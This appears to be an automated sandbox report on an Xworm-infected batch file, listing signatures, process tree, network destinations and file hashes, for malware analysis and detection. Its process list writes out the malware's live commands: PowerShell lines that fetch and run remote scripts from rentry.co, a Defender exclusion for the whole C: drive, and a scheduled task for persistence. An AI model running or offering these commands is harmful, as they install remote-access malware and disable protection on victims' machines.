Analysis Overview
SHA256
57754e153ca09796a238926d33c4ade8686c94c1bde3040405ea793afb273065
Threat Level: Known bad
The file $77APCONSVC.bat was found to be: Known bad.
Malicious Activity Summary
Detect Xworm Payload
Xworm
Blocklisted process makes network request
Executes dropped EXE
Legitimate hosting services abused for malware hosting/C2
Drops file in Windows directory
Enumerates physical storage devices
Creates scheduled task(s)
Uses Task Scheduler COM API
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Modifies registry class
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-02 14:33
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-02 14:33
Reported
2024-04-02 14:35
Platform
win11-20240221-en
Max time kernel
106s
Max time network
113s
Command Line
Signatures
Detect Xworm Payload
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Exclusions.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ntelCpHDCPSvc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\ntelCpHDCPSvc.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Panther\UnattendGC\setupact.log | C:\Windows\System32\oobe\UserOOBEBroker.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\setuperr.log | C:\Windows\System32\oobe\UserOOBEBroker.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagerr.xml | C:\Windows\System32\oobe\UserOOBEBroker.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagwrn.xml | C:\Windows\System32\oobe\UserOOBEBroker.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4181651180-3163410697-3990547336-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\ntelCpHDCPSvc.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\ntelCpHDCPSvc.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\$77APCONSVC.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm rentry.co/Hokm/raw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e [base64-encoded command removed]
C:\Users\Admin\AppData\Local\Temp\Exclusions.exe
"C:\Users\Admin\AppData\Local\Temp\Exclusions.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -WindowStyle Hidden -Command Add-MpPreference -ExclusionPath 'C:\'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm rentry.co/windowscop/raw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e [base64-encoded command removed]
C:\Users\Admin\AppData\Local\Temp\ntelCpHDCPSvc.exe
"C:\Users\Admin\AppData\Local\Temp\ntelCpHDCPSvc.exe"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "ntelCpHDCPSvc" /tr "C:\Users\Admin\AppData\Roaming\ntelCpHDCPSvc.exe"
C:\Users\Admin\AppData\Roaming\ntelCpHDCPSvc.exe
C:\Users\Admin\AppData\Roaming\ntelCpHDCPSvc.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
C:\Windows\System32\oobe\UserOOBEBroker.exe
C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | rentry.co | udp |
| US | 104.21.95.148:80 | rentry.co | tcp |
| US | 104.21.95.148:443 | rentry.co | tcp |
| US | 8.8.8.8:53 | 148.95.21.104.in-addr.arpa | udp |
| DE | 140.82.121.3:443 | github.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 104.21.95.148:80 | rentry.co | tcp |
| US | 104.21.95.148:443 | rentry.co | tcp |
| DE | 140.82.121.3:443 | github.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 147.185.221.17:50064 | | tcp |
| US | 147.185.221.17:50064 | | tcp |
| GB | 92.123.128.171:443 | | tcp |
| GB | 92.123.128.171:443 | | tcp |
| IE | 13.69.239.79:443 | browser.pipe.aria.microsoft.com | tcp |
| GB | 95.101.143.195:443 | r.bing.com | tcp |
| US | 52.111.229.19:443 | | tcp |
| GB | 2.18.66.169:443 | www.bing.com | tcp |
| GB | 104.78.171.70:443 | cxcs.microsoft.net | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i0vovggi.xrq.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3828-8-0x0000028FBF3D0000-0x0000028FBF3F2000-memory.dmp
memory/3828-9-0x00007FFDA5710000-0x00007FFDA61D2000-memory.dmp
memory/3828-10-0x0000028FBF1B0000-0x0000028FBF1C0000-memory.dmp
memory/3828-11-0x0000028FBF1B0000-0x0000028FBF1C0000-memory.dmp
memory/3828-12-0x0000028FBF1B0000-0x0000028FBF1C0000-memory.dmp
memory/3828-13-0x0000028FBF9A0000-0x0000028FBFB62000-memory.dmp
memory/1224-14-0x00007FFDA5710000-0x00007FFDA61D2000-memory.dmp
memory/1224-15-0x00000213F9AB0000-0x00000213F9AC0000-memory.dmp
memory/1224-24-0x00000213F9AB0000-0x00000213F9AC0000-memory.dmp
memory/1224-25-0x00000213FA6B0000-0x00000213FABD8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Exclusions.exe
| MD5 | 7a8a167aa932adf70e56092286bc78fa |
| SHA1 | 898ad11a51d73aac4a2f6b9ca1605bd247b638df |
| SHA256 | 7eac536d3a70d7611d17d7264a600f629422d22a76c6b0714c256e2a86d636f6 |
| SHA512 | 8173301f56ae0f1e8a96832699c18abacb9279609f485602f5bdc228678ced6001b7deb6ef34c2df00185d8c7834cd5677d4035e87d6f71a01a9941c4444557e |
memory/1224-39-0x00007FFDA5710000-0x00007FFDA61D2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a2d4f8f586db3a1bf63dae4b3f6e95f0 |
| SHA1 | 0e15301e9601b00ff0e3355ed31ee8be38abda64 |
| SHA256 | f196ca71b518471837346a0f7b124bd6687c73b766208c844fdf86c4ac520a27 |
| SHA512 | 43129285995077704c5c68b115a89e3027fa0c34ef3ad07af0be1397e51e972ab4cfa35460d53ad643cf8f0da9a01adb17f605459a258c8efd96be7d5b07be36 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 46cdba1da80767357c761c7c088d884a |
| SHA1 | 5204853290d20e63c54aa08c0750905f9698e563 |
| SHA256 | 3744bbf2527d056a2c0e3ea22a5b19bf9bbdc491a72df5b7563d875f075787a6 |
| SHA512 | c8dd60f7dc30e67a72efc8631d0ef9ec0cfd40ba822d5827bd5ba1f63bacac27a6a2243902d7986acf4110264f02809d74603a91965c2809b3f0194c6147ea34 |
memory/2724-43-0x0000000000DD0000-0x0000000000DD8000-memory.dmp
memory/2724-44-0x0000000074DE0000-0x0000000075591000-memory.dmp
memory/3828-45-0x00007FFDA5710000-0x00007FFDA61D2000-memory.dmp
memory/2724-47-0x0000000074DE0000-0x0000000075591000-memory.dmp
memory/2676-48-0x00007FFDA5710000-0x00007FFDA61D2000-memory.dmp
memory/2676-49-0x0000022C6ABE0000-0x0000022C6ABF0000-memory.dmp
memory/3936-59-0x0000000074E60000-0x0000000075611000-memory.dmp
memory/3936-60-0x00000000048F0000-0x0000000004900000-memory.dmp
memory/3936-62-0x0000000004F70000-0x000000000559A000-memory.dmp
memory/3936-61-0x00000000048F0000-0x0000000004900000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ad60aefe903d80a798b904be4a3f0283 |
| SHA1 | 5a27227a9aec298c043d9fe4162cc64664c01a25 |
| SHA256 | 17c944d3e6e2a0dd06c58ae9cefe305fa7da552c010c012625abcc9585eeb214 |
| SHA512 | 5a9ed746dd825929a2fa1a00b983563538be92a6b85df3728177e3a026babf659c0afadbf544c27aeae9b492b62ac9319af50eeeae610b0aee5256966d96470a |
memory/3936-58-0x0000000004900000-0x0000000004936000-memory.dmp
memory/3936-64-0x00000000055D0000-0x00000000055F2000-memory.dmp
memory/3936-65-0x00000000057F0000-0x0000000005856000-memory.dmp
memory/3936-66-0x0000000005860000-0x00000000058C6000-memory.dmp
memory/3936-75-0x00000000058E0000-0x0000000005C37000-memory.dmp
memory/3936-76-0x0000000005DB0000-0x0000000005DCE000-memory.dmp
memory/3936-77-0x0000000005E50000-0x0000000005E9C000-memory.dmp
memory/3652-78-0x00007FFDA5710000-0x00007FFDA61D2000-memory.dmp
memory/3652-80-0x0000020CEF8A0000-0x0000020CEF8B0000-memory.dmp
memory/3652-79-0x0000020CEF8A0000-0x0000020CEF8B0000-memory.dmp
memory/3936-90-0x0000000006D90000-0x0000000006DC4000-memory.dmp
memory/3936-91-0x0000000071050000-0x000000007109C000-memory.dmp
memory/3936-89-0x000000007F8B0000-0x000000007F8C0000-memory.dmp
memory/3936-101-0x00000000048F0000-0x0000000004900000-memory.dmp
memory/3936-100-0x0000000006370000-0x000000000638E000-memory.dmp
memory/3936-102-0x0000000006E50000-0x0000000006EF4000-memory.dmp
memory/3936-103-0x00000000077B0000-0x0000000007E2A000-memory.dmp
memory/3936-104-0x0000000007170000-0x000000000718A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ntelCpHDCPSvc.exe
| MD5 | 645384c8b2ed0e08aed63ed58ecb9720 |
| SHA1 | 666eefdf934dbb63b835817a2ac31b3e923662a9 |
| SHA256 | cec2f548fbf7c1abf104af50e13301b8d46ee1be21a37579d81549ec4699b33b |
| SHA512 | 2f46e13a25d2ec2b6182f0efdb0200356c9eeaae554c4781f46f701109058f9df8088b38c990b326c4cb8ff887d42660fdea1a873166bcb335992b36398e3c0b |
memory/3936-113-0x00000000071F0000-0x00000000071FA000-memory.dmp
memory/4656-118-0x00000000006E0000-0x00000000006EE000-memory.dmp
memory/3652-120-0x00007FFDA5710000-0x00007FFDA61D2000-memory.dmp
memory/2676-119-0x00007FFDA5710000-0x00007FFDA61D2000-memory.dmp
memory/3936-121-0x0000000007400000-0x0000000007496000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a1a3f9433eb42ddf260af753ba66dc3f |
| SHA1 | 2d4f874754eab0bcc2611d3f54e303116f620730 |
| SHA256 | 1f4425454d3ccef1488ee6fa4dbf56c4c972861f9ecd56fe23cbfeb261558a03 |
| SHA512 | 8eb723a2ee37ec0526cbcc42f6360fb7091aedc2cf143ae7bc4bdfb9793c26fb6507eb15453396e4c9cb204eb19550956f9cdce58fdc94906d8d8a73b39c5637 |
memory/4656-125-0x00007FFDA5710000-0x00007FFDA61D2000-memory.dmp
memory/3936-124-0x0000000007380000-0x0000000007391000-memory.dmp
memory/2676-126-0x00007FFDA5710000-0x00007FFDA61D2000-memory.dmp
memory/3936-127-0x00000000073B0000-0x00000000073BE000-memory.dmp
memory/3936-128-0x00000000073C0000-0x00000000073D5000-memory.dmp
memory/3936-129-0x00000000074C0000-0x00000000074DA000-memory.dmp
memory/3936-130-0x00000000074B0000-0x00000000074B8000-memory.dmp
memory/3936-134-0x0000000074E60000-0x0000000075611000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1dc99fbb1ba0df8c6586b12368016957 |
| SHA1 | f071eb96c9e7f7875ddeafe67d5012c6f459a4ec |
| SHA256 | b7ad6396f957cf8f422e3325c4f6b02c2fd17e8f53671ced30457c25adf36c8f |
| SHA512 | ac4173dac07e8a85e4bac5b941a5e2334f3ae6c637b608a93c7832e93d44c0b1c6d60299854ed439e77e7e9cae45b88c4791a9f8dd5f7fce4d6835ccd5b62348 |
memory/4656-136-0x0000000000F20000-0x0000000000F30000-memory.dmp
memory/4656-137-0x000000001BD30000-0x000000001BD3A000-memory.dmp
memory/4656-138-0x00007FFDA5710000-0x00007FFDA61D2000-memory.dmp
memory/4272-141-0x00007FFDA5710000-0x00007FFDA61D2000-memory.dmp
memory/4272-143-0x00007FFDA5710000-0x00007FFDA61D2000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
| MD5 | 82678367fa4297a26727ccc84e0b2f60 |
| SHA1 | 0c65ab90390566f7d2f5b4751b9027f6bac1d22a |
| SHA256 | fbf7356b28e05edc871dda40b318b147e6d07ece028da3d67c3cfbd30bfa0f29 |
| SHA512 | e5474444eecac25a06fe26a22dce9aa9311740dca264de1c824a36a7bc55216f301e934667fe0b9c3c7b062694f8a37e45ecce6b3889cb33bb47ecb9bd198db5 |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
| MD5 | 28d32a16ce87d488acc7632092f7d566 |
| SHA1 | 325dd247e49113dd987531ffe7ca26c22ce08c31 |
| SHA256 | ba6d4f09117c098bd27508a14d44822f13399ebe16d5d2539ad2844157fa4907 |
| SHA512 | 8159021f9d0e28d370faddf7fa41aa9d4bdf7a1aee71779706e43c30486526a0636568d8f90c580da543f8393f546090f71f87382f99e3e0a2b227b04670af57 |